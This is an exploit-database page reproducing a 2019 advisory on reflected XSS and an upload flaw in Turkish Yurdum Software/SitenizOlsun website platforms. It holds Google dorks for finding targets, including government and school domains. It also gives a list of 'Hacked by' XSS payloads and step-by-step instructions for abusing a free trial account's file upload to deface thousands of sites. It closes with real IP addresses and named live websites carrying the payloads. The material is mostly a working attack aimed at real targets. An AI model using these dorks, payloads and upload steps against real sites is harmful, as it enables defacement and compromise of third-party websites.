Advertisement






Yurdum Software Reflected XSS Privilege Escalation

CVE Category Price Severity
CWE-79 Unknown Critical
Author Risk Exploitation Type Date
Unknown High Remote 2019-06-17
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019060104

Below is a copy:

Yurdum Software Reflected XSS Privilege Escalation
###################################################################

# Exploit Title : Yurdum Software Reflected XSS Privilege Escalation
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 17/06/2019
# Vendor Homepages : yurdumyazilim.com ~ sitenizolsun.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : High
# Vulnerability Type : 
CWE-79 [ Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') ]
CWE-671 [ Lack of Administrator Control over Security ]
CWE-522 [ Insufficiently Protected Credentials ]
CWE-284 [ Improper Access Control ]
CWE-285 [ Improper Authorization ]
# Google Dorks : 
inurl:/?pnum= intext:Yer salayc: Yurdum Yazlm site:tr
inurl:/?pnum= intext:Yer salayc: SitenizOlsun. site:tr
intext:Yer salayc: SitenizOlsun site:tr
intext:Yer salayc: Yurdum Yazlm site:tr
inurl:/?pnum= site:tr
inurl:/?pnum= site:gov.tr
inurl:/?pnum= site:bel.tr
inurl:/?pnum= site:k12.tr
inurl:/?pnum= site:org.tr
inurl:/?pnum= site:com.tr
inurl:/?pnum= site:com
inurl:/?pnum= site:net
inurl:/?pnum= site:org
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Reference Link : cxsecurity.com/ascii/WLB-2019010038

###################################################################

Impact 1 Reflected XSS Cross Site Scripting (or Non-Persistent) :
*********************************************************
The server reads data directly from the HTTP request and reflects it back in the 
HTTP response. Reflected XSS exploits occur when an attacker causes a victim to supply 
dangerous content to a vulnerable web application, which is then reflected back to the victim
 and executed by the web browser. The most common mechanism for delivering malicious 
content is to include it as a parameter in a URL that is posted publicly or e-mailed directly 
to the victim. URLs constructed in this manner constitute the core of many phishing 
schemes, whereby an attacker convinces a victim to visit a URL that refers to a vulnerable site. 
After the site reflects the attacker's content back to the victim,the content is 
executed by the victim's browser. A successful exploit could allow the attacker
to execute arbitrary script code in the context of the affected site
and allow the attacker to access sensitive browser-based information.
An attacker, for example,can exploit this vulnerability to steal cookies from
the attacked user in order to hijack a session and gain access to the system.

Impact 2 Lack of Administrator Control over Security :
***********************************************
The product uses security features in a way that prevents the product's administrator from 
tailoring security settings to reflect the environment in which the product is being used. 
This introduces resultant weaknesses or prevents it from operating at a level of security 
that is desired by the administrator.This weakness occurs when the application transmits 
or stores authentication credentials and uses an insecure method that is susceptible to 
unauthorized interception and/or retrieval.The software does not perform or incorrectly 
performs an authorization check when an actor attempts to access a resource or 
perform an action. An attacker could gain access to user accounts and access sensitive
data used by the user accounts.

###################################################################

# Reflected Cross Site Scripting XSS Exploits and Payloads :
*******************************************************
1%27<marquee><font%20color=lime%20size=32>XSS-Vulnerability-Found-By-KingSkrupellos</font></marquee>

1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E

/?pnum=1&pt=1%27"></h3></tr></td></table></tr></td></table></div><marquee>XSS-Vulnerability-Found-By-KingSkrupellos

/?pnum=1&pt=1%27<marquee><font%20color=lime%20size=32>KingSkrupellos</font></marquee>

/?pnum=1&pt=1%27<marquee><font%20color=lime%20size=32>Hacked%20by%20KingSkrupellos</font></marquee>

/?pnum=[ID-NUMBER]&pt=1%27<marquee><font%20color=lime%20size=32>Hacked%20by%20KingSkrupellos</font></marquee>

/?SyfNmb=3&pt=1%27<marquee><font%20color=lime%20size=32>Hacked%20by%20KingSkrupellos</font></marquee>

/?SyfNmb=[ID-NUMBER]&pt=1%27<marquee><font%20color=lime%20size=32>Hacked%20by%20KingSkrupellos</font></marquee>

/?Syf=4&pt=1%27<marquee><font%20color=lime%20size=32>Hacked%20by%20KingSkrupellos</font></marquee>

/?Syf=[ID-NUMBER]&pt=1%27<marquee><font%20color=lime%20size=32>Hacked%20by%20KingSkrupellos</font></marquee>

/?product=1&pt=1%27<marquee><font%20color=lime%20size=32>Hacked%20by%20KingSkrupellos</font></marquee>

/?product=[ID-NUMBER]&pt=1%27<marquee><font%20color=lime%20size=32>Hacked%20by%20KingSkrupellos</font></marquee>

# Add Administrator / Privilege Escalation Vulnerability :
***********************************************
To Take Administrator Account Register to sitenizolsun.com => Click '' cretsiz Dene " [ Try Free ]

Then you will redirected to this address.

sitenizolsun.com/website-temalari?paket=6

sitenizolsun.com/website-temalari?paket=[ID-NUMBER]

Choose one packet which you want. 

sitenizolsun.com/website-ucretsiz-deneme-form.php?website-theme=6&paket=6

sitenizolsun.com/website-ucretsiz-deneme-form.php?website-theme=[ID-NUMBER]&paket=[ID-NUMBER]

cretsiz Deneme Web Siteni Olutur [ Create your Free Test Account ]

Create any Random username - Create Random or your real E-Mail Address - Create Title - Random Phone Number

Then Click " Sitemi Olutur " [ Create My Website ]. Please Wait. 

It will create test site and administrator e-mail address and password.

http://[TEST-TARGET-WEBSITE-HERE].denemepaketi.com

Ynetim paneli kullanc adnz: YOUR ADMINISTRATOR E-MAIL ADDRESS HERE
Ynetim paneli ifreniz : YOUR ADMINISTRATOR PASSWORD HERE

Administrator Login Path : 

/login/
/login/do_login.php

One Free Test Website - But you can control approximately 9397 websites at the same. 

You can upload files to the vulnerable system. 

Step 1 : Go to the " Temel Sayfalar " [ Main Pages ] => Anasayfa [ Homepage ] => 

Step 2 : Click to " Anasayfay Dzenle " [ Edit Homepage ]

Step 3 : Choose " Resim Ekle " [ Insert Image ] => Click to " Kaynak " [ Source ]

Step 4 : /syp/dosyayukle.php?DosyaTipi=2

http://[TEST-TARGET-WEBSITE-HERE].denemepaketi.com/syp/dosyayukle.php?DosyaTipi=2

You will see a yellow and white page and it says :

Step 5 : Yklemek istediiniz dosyalar "Gzat"a tklayarak bilgisayarnzdan seiniz ve "Ykle" ye tklaynz.

[ Select the files you want to upload from your computer by clicking "Browse" and click "Upload". ]

Step 6 : Choose " Sayfaya sdr (Resimler iin geerli) Max 30 MB " 

Step 7 : Choose your .html file from your PC and upload it. But choose HTML. Click " Ykle " [ Upload ] Button.

Your File Destination : 

/FileUpload/epXXXXXX/File/[yourfilename.html]

If you another sections such as " Add Header Image " or " Add Album "

Your File Destination : 

/FileUpload/epXXXXXX/HeaderImages/crop/[RANDOM-NUMBERS].jpg

/FileUpload/epXXXXXX/Album/epXXXXXX_[YEAR][MONTH][DAY][RANDOM-NUMBERS].jpg

You can see your defaced indexes on 9397 websites at the same.

Congratulations :) 

###################################################################

# Example Vulnerable Sites for XSS Reflected Cross Site Scripting  :
***********************************************************
Vulnerable IP Addresses => 

51.254.33.49 => There are 37 domains hosted on this server.

81.171.1.140 => There are 8,552 domains hosted on this server.

159.69.209.93 => There are 798 domains hosted on this server.

[+] gurelektrikotomasyon.com/?Syf=4&pt=1%27%3Cmarquee%3E%3CfAnt
%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E

[+] giresunkesaparnavutkoy.com/?SyfNmb=2&pt=1%27%3Cmarquee%3E
%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E

[+] gezintihaberleri.com/?SyfNmb=4&pt=1%27%3Cmarquee%3E%3Cfont
%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E

[+] furkankirtasiye.com/?pnum=8&pt=1%27%3Cmarquee%3E%3Cfont
%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E

[+] edirneselimiyeemlak.com/?Syf=13&pt=1%27%3Cmarquee%3E%3Cfont
%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E

[+] giresunkesaparnavutkoy.com/?SyfNmb=2&pt=1%27%3Cmarquee%3E
%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E

[+] doganisguvenligi.com/?Syf=21&pt=1%27%3Cmarquee%3E%3Cfont
%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E

[+] cyberenerji.com/?pnum=9&pt=1%27%3Cmarquee%3E%3Cfont
%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E

[+] siirtfistikpazari.com/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont
%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E

[+] saglamelektronik.com/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont
%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E

[+] radyobalkan.com/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont
%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E

[+] pediatrikkalpcerrahisi.com/?Syf=15&blg=1&ncat_id=699210&pt=
1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked
%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E

[+] ozerdeminsaatdekorasyon.com/?pnum=1&pt=1%27%3Cmarquee
%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E

[+] otoarizatespit.org/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont
%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E

[+] onaranelektrik.com/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont
%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E

[+] oabtfizik.com/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont%20color=
lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E

[+] trabzonbasket.com/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont%20color=
lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E

[+] ozelegitimaraclari.com/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont%20color=
lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E

[+] reklamfolyosu.com/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont%20color=
lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E

[+] sivasaskf.org/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont%20color=
lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E

[+] tablopark.com/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont%20color=
lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E

[+] vansuaritmaci.com/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont%20color=
lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E

[+] noktadusakabin.com/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont%20color=
lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E

###################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

###################################################################

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum